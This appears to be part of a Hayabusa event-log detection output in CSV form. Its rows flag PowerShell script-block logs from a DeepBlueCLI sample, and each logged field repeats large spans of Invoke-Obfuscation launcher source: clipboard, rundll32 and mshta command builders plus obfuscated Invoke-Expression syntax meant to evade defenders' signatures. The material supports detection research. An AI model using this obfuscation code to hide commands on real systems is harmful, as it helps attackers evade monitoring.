CLIP++ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # Since we're embedding $PowerShellClip syntax one more process deep we need to double-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""^$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""^$Char"",""^^^$Char"") } } # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PsCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 11 { ############## ## RUNDLL++ ## ############## # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$InvokeOption`"""" $RundllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToRunDll + $RundllCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToRunDll , $RundllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 12 { ############# ## MSHTA++ ## ############# # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. # Keep calling Out-RandomInvokeRandomEnvironmentVariableSyntax until we get the shorter syntax (not using $ExecutionContext syntax) since mshta.exe has a short argument size limitation. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') While($InvokeOption.Length -gt 200) { $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') } # Generate randomize case syntax for all available command arguments for mshta.exe. $CreateObject = ([Char[]]'VBScript:CreateObject' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WScriptShell = ([Char[]]'WScript.Shell' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Run = ([Char[]]'.Run' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $TrueString = ([Char[]]'True' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WindowClose = ([Char[]]'Window.Close' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomly decide whether to concatenate WScript.Shell or just encapsulate it with double quotes. If((Get-Random -Input @(0..1)) -eq 0) { $WScriptShell = Out-ConcatenatedString $WScriptShell '""' } Else { $WScriptShell = '""' + $WScriptShell + '""' } # Randomly decide whether or not to concatenate PowerShell command. If((Get-Random -Input @(0..1)) -eq 0) { # Concatenate $InvokeOption and unescape double quotes from the result. $SubStringArray += (Out-ConcatenatedString $InvokeOption.Trim('""') '""').Replace('`""','""') # Remove concatenation introduced in above step if it concatenates immediately after a cmd.exe escape character. If($InvokeOption.Contains('^""+""')) { $InvokeOption = $InvokeOption.Replace('^""+""','^') } } # Random choose between using the numeral 1 and using a random subtraction syntax that is equivalent to 1. If((Get-Random -Input @(0..1)) -eq 0) { $One = 1 } Else { # Randomly select between two digit and three digit subtraction syntax. $RandomNumber = Get-Random -Minimum 3 -Maximum 25 If(Get-Random -Input @(0..1)) { $One = [String]$RandomNumber + '-' + ($RandomNumber-1) } Else { $SecondRandomNumber = Get-Random -Minimum 1 -Maximum $RandomNumber $One = [String]$RandomNumber + '-' + $SecondRandomNumber + '-' + ($RandomNumber-$SecondRandomNumber-1) } # Randomly decide to encapsulate with parentheses (not necessary). If((Get-Random -Input @(0..1)) -eq 0) { $One = '(' + $One + ')' } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption + '"",' + $One + ',' + $TrueString + "")($WindowClose)"" $MshtaCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $CreateObject + ""($WScriptShell)"" + $Run + '(""' + $PathToPowerShell + $PSCmdSyntax + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToMshta + $MshtaCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToMshta , $MshtaCmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } default {Write-Error ""An invalid `$LaunchType value ($LaunchType) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } # Output process tree output format of applied launcher to help the Blue Team find indicators and the Red Team to better avoid detection. If($ArgsDefenderWillSee.Count -gt 0) { Write-Host ""`n`nProcess Argument Tree of ObfuscatedCommand with current launcher:"" $Counter = -1 ForEach($Line in $ArgsDefenderWillSee) { If($Line.Count -gt 1) { $Part1 = $Line[0] $Part2 = $Line[1] } Else { $Part1 = $Line $Part2 = '' } $LineSpacing = '' If($Counter -ge 0) { $LineSpacing = ' '*$Counter Write-Host ""$LineSpacing|`n$LineSpacing\--> "" -NoNewline } # Print each command and argument, handling if the argument length is too long to display coherently. Write-Host $Part1 -NoNewLine -ForegroundColor Yellow # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 If($Part2.Length -gt $CmdMaxLength) { # Output Part2, handling if the size of Part2 exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ($Part1.Length+$LineSpacing.Length) $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $Part2.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Cyan Write-Host $RedactionMessage -NoNewLine -ForegroundColor Magenta Write-Host $Part2.SubString($Part2.Length-$RedactedPrintLength) -ForegroundColor Cyan } Else { Write-Host $Part2 -ForegroundColor Cyan } $Counter++ } Start-Sleep 1 } # Make sure final command doesn't exceed cmd.exe's character limit. # Only apply this check to LaunchType values less than 13 since all the other launchers are not command line launchers. $CmdMaxLength = 8190 If(($CmdLineOutput.Length -gt $CmdMaxLength) -AND ($LaunchType -lt 13)) { Write-Host """" Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" Start-Sleep 1 } Return $CmdLineOutput } Function Out-RandomInvokeRandomEnvironmentVariableSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized syntax for invoking a process-level environment variable. Invoke-Obfuscation Function: Out-RandomInvokeRandomEnvironmentVariableSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomInvokeRandomEnvironmentVariableSyntax generates random invoke syntax and random process-level environment variable retrieval syntax for invoking command contents that are stored in a user-input process-level environment variable. This function is primarily used as a helper function for Out-PowerShellLauncher. .PARAMETER EnvVarName User input string or array of strings containing environment variable names to randomly select and apply invoke syntax. .EXAMPLE C:\PS> Out-RandomInvokeRandomEnvironmentVariableSyntax 'varname' .(\""In\"" +\""v\"" + \""o\""+ \""Ke-ExpRes\""+ \""sION\"" ) (^&( \""GC\"" +\""i\"" ) eNV:vaRNAMe ).\""V`ALue\"" .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options wher",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$InvokeOption`"""" $RundllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToRunDll + $RundllCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToRunDll , $RundllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 12 { ############# ## MSHTA++ ## ############# # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. # Keep calling Out-RandomInvokeRandomEnvironmentVariableSyntax until we get the shorter syntax (not using $ExecutionContext syntax) since mshta.exe has a short argument size limitation. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') While($InvokeOption.Length -gt 200) { $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') } # Generate randomize case syntax for all available command arguments for mshta.exe. $CreateObject = ([Char[]]'VBScript:CreateObject' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WScriptShell = ([Char[]]'WScript.Shell' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Run = ([Char[]]'.Run' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $TrueString = ([Char[]]'True' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WindowClose = ([Char[]]'Window.Close' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomly decide whether to concatenate WScript.Shell or just encapsulate it with double quotes. If((Get-Random -Input @(0..1)) -eq 0) { $WScriptShell = Out-ConcatenatedString $WScriptShell '""' } Else { $WScriptShell = '""' + $WScriptShell + '""' } # Randomly decide whether or not to concatenate PowerShell command. If((Get-Random -Input @(0..1)) -eq 0) { # Concatenate $InvokeOption and unescape double quotes from the result. $SubStringArray += (Out-ConcatenatedString $InvokeOption.Trim('""') '""').Replace('`""','""') # Remove concatenation introduced in above step if it concatenates immediately after a cmd.exe escape character. If($InvokeOption.Contains('^""+""')) { $InvokeOption = $InvokeOption.Replace('^""+""','^') } } # Random choose between using the numeral 1 and using a random subtraction syntax that is equivalent to 1. If((Get-Random -Input @(0..1)) -eq 0) { $One = 1 } Else { # Randomly select between two digit and three digit subtraction syntax. $RandomNumber = Get-Random -Minimum 3 -Maximum 25 If(Get-Random -Input @(0..1)) { $One = [String]$RandomNumber + '-' + ($RandomNumber-1) } Else { $SecondRandomNumber = Get-Random -Minimum 1 -Maximum $RandomNumber $One = [String]$RandomNumber + '-' + $SecondRandomNumber + '-' + ($RandomNumber-$SecondRandomNumber-1) } # Randomly decide to encapsulate with parentheses (not necessary). If((Get-Random -Input @(0..1)) -eq 0) { $One = '(' + $One + ')' } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption + '"",' + $One + ',' + $TrueString + "")($WindowClose)"" $MshtaCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $CreateObject + ""($WScriptShell)"" + $Run + '(""' + $PathToPowerShell + $PSCmdSyntax + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToMshta + $MshtaCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToMshta , $MshtaCmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } default {Write-Error ""An invalid `$LaunchType value ($LaunchType) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } # Output process tree output format of applied launcher to help the Blue Team find indicators and the Red Team to better avoid detection. If($ArgsDefenderWillSee.Count -gt 0) { Write-Host ""`n`nProcess Argument Tree of ObfuscatedCommand with current launcher:"" $Counter = -1 ForEach($Line in $ArgsDefenderWillSee) { If($Line.Count -gt 1) { $Part1 = $Line[0] $Part2 = $Line[1] } Else { $Part1 = $Line $Part2 = '' } $LineSpacing = '' If($Counter -ge 0) { $LineSpacing = ' '*$Counter Write-Host ""$LineSpacing|`n$LineSpacing\--> "" -NoNewline } # Print each command and argument, handling if the argument length is too long to display coherently. Write-Host $Part1 -NoNewLine -ForegroundColor Yellow # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 If($Part2.Length -gt $CmdMaxLength) { # Output Part2, handling if the size of Part2 exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ($Part1.Length+$LineSpacing.Length) $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $Part2.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Cyan Write-Host $RedactionMessage -NoNewLine -ForegroundColor Magenta Write-Host $Part2.SubString($Part2.Length-$RedactedPrintLength) -ForegroundColor Cyan } Else { Write-Host $Part2 -ForegroundColor Cyan } $Counter++ } Start-Sleep 1 } # Make sure final command doesn't exceed cmd.exe's character limit. # Only apply this check to LaunchType values less than 13 since all the other launchers are not command line launchers. $CmdMaxLength = 8190 If(($CmdLineOutput.Length -gt $CmdMaxLength) -AND ($LaunchType -lt 13)) { Write-Host """" Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" Start-Sleep 1 } Return $CmdLineOutput } Function Out-RandomInvokeRandomEnvironmentVariableSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized syntax for invoking a process-level environment variable. Invoke-Obfuscation Function: Out-RandomInvokeRandomEnvironmentVariableSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomInvokeRandomEnvironmentVariableSyntax generates random invoke syntax and random process-level environment variable retrieval syntax for invoking command contents that are stored in a user-input process-level environment variable. This function is primarily used as a helper function for Out-PowerShellLauncher. .PARAMETER EnvVarName User input string or array of strings containing environment variable names to randomly select and apply invoke syntax. .EXAMPLE C:\PS> Out-RandomInvokeRandomEnvironmentVariableSyntax 'varname' .(\""In\"" +\""v\"" + \""o\""+ \""Ke-ExpRes\""+ \""sION\"" ) (^&( \""GC\"" +\""i\"" ) eNV:vaRNAMe ).\""V`ALue\"" .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options wher",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"e the PowerShell command is set in process-level environment variables for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String[]] $EnvVarName ) # Retrieve random variable from variable name array passed in as argument. $EnvVarName = Get-Random -Input $EnvVarName # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $EnvVarName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$EnvVarName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetRandomVariableSyntax If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random invoke operation through the appropriate token obfuscators if $PowerShellStdIn is not simply a value of - from above random options. If($InvokeOption -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 